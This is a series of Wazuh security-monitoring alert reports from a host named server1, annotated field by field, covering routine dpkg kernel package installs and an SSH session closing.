When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533404.25910
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:22 status half-configured linux-headers-generic:amd64 6.8.0-57.59
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-headers-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-57.59
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) requested to install.

🧠 What happened? New dpkg (Debian Package) requested to install.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:24.273+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:24.273+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) requested to install.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2901
Numeric ID of the detection rule that fired.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533404.26411
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:22 install linux-tools-6.8.0-58:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  install
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-tools-6.8.0-58
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) requested to install.

🧠 What happened? New dpkg (Debian Package) requested to install.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:24.274+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:24.274+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) requested to install.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2901
Numeric ID of the detection rule that fired.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533404.26833
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:23 install linux-tools-6.8.0-58-generic:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  install
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-tools-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:24.274+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:24.274+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  12
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533404.27271
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:23 status half-configured linux-modules-6.8.0-58-generic:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-modules-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-58.60
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) installed.

🧠 What happened? New dpkg (Debian Package) installed.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:30.302+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:30.302+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) installed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2902
Numeric ID of the detection rule that fired.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533410.27790
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:30 status installed linux-modules-6.8.0-58-generic:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status installed
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-modules-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-58.60
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:30.303+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:30.303+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  13
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533410.28295
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:30 status half-configured linux-tools-6.8.0-58:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-tools-6.8.0-58
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-58.60
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) installed.

🧠 What happened? New dpkg (Debian Package) installed.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:30.329+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:30.329+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) installed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2902
Numeric ID of the detection rule that fired.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533410.28794
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:30 status installed linux-tools-6.8.0-58:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status installed
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-tools-6.8.0-58
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-58.60
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:30.329+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:30.329+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  14
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533410.29279
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:30 status half-configured linux-image-6.8.0-58-generic:amd64 6.8.0-58.60+1
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-image-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-58.60+1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

PAM: Login session closed.

🧠 What happened? PAM: Login session closed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:23:38.296+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:38.296+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  PAM: Login session closed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5502
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['pam', 'syslog']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['7.8', '7.9']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533418.29798
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:23:38.270570+00:00 server1 sshd[71763]: pam_unix(sshd:session): session closed for user simba
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  sshd
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:23:38.270570+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  pam
Parent decoder used – for nested parsing.

decoder.name:  pam
Name of the Wazuh decoder that parsed this raw log.

data.dstuser:  simba
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

New dpkg (Debian Package) installed.

🧠 What happened? New dpkg (Debian Package) installed.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:38.296+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:38.296+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New dpkg (Debian Package) installed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2902
Numeric ID of the detection rule that fired.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533418.30190
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:37 status installed linux-image-6.8.0-58-generic:amd64 6.8.0-58.60+1
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status installed
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-image-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-58.60+1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Dpkg (Debian Package) half configured.

🧠 What happened? Dpkg (Debian Package) half configured.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:23:38.296+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:23:38.296+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Dpkg (Debian Package) half configured.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  2904
Numeric ID of the detection rule that fired.

rule.firedtimes:  15
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'dpkg', 'config_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6.1', '10.2.7']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['4.10']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.2', 'CC7.3', 'CC6.8', 'CC8.1']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533418.30695
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24 22:23:37 status half-configured linux-tools-6.8.0-58-generic:amd64 6.8.0-58.60
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.name:  dpkg-decoder
Name of the Wazuh decoder that parsed this raw log.

data.dpkg_status:  status half-configured
Result of dpkg query on Debian – often ‘not‑installed’, ‘config‑files’, etc.

data.package:  linux-tools-6.8.0-58-generic
Package name involved (apt/yum). Good for vuln tracking.

data.arch:  amd64
System CPU architecture (x64, ARM). Helps pick correct malware sample or patch.

data.version:  6.8.0-58.60
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/dpkg.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

